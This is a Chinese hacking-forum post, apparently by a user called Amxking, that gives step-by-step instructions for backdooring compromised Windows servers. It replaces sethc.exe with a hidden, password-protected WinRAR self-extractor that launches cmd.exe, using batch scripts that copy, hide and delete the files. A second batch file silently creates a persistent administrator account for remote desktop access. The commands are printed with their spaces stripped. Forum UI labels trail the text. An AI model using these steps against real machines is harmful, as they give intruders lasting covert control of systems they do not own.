前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking
1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
2.再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
3.将win.rar做成自解压格式:
添加新的自解压→Default.游戏X图形界面RAR自解压模块→高级自解压选项→解压后运行(添加:cmd.exe也有用%SystemRoot%\explorer.exe的)→模式→选择:全部隐藏+覆盖所有文件→确定
4.然后我们再建立一个批处理文件RU.BAT,用来将win.exe(win.rar做成自解压后生成的文件)替换到system32下.
主要实现目的为执行:
copywin.exeC:\WINDOWS\system32\sethc.exe/ycopywin.exeC:\WINDOWS\system32\dllcache\sethc.exe/y
这是一位网友写的批处理RU.BAT,可以借鉴.都是满简单的.
@echooffcls
copywin.exeC:\WINDOWS\system32\sethc.execopywin.exeC:\WINDOWS\system32\dllcache\sethc.exeattribC:\WINDOWS\system32\sethc.exesethc.exeattribC:\WINDOWS\system32\dllcache\sethc.exe+hechoclsecho.delwin.exe
del%0%
5.将RU.BAT及WIN.EXE传到肉鸡上并运行RU.BAT就完成了shift后门的安装.
不死3389帐号:
关于不死帐号的方法常见的几种中我们今天简单的介绍一种依靠特殊路径开机自动执行BAT命令添加管理帐户的方法.很简单,一看就明白了,这里我也不多做解释了:
制作批处理文件ad.bat,代码内容为:
@echooff
cls
netuseramxking/delnetuseramxking!@#$%^&*(000/add注释:前面amxking是用户名后面!@#$%^&*(000是密码,如此设置一是提权为管理帐户.也就实现了所谓的不死帐号.
注意:路径在具体过程中需要自己修改,别抱着C:\WINDOWS就不变,脑袋要灵活点,哪里是%SystemRoot%就改成哪里.^_^
PS:按5次shift键后门.exe工具如果再加些功能比如设置密码,那就不用这么麻烦了
*
* |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡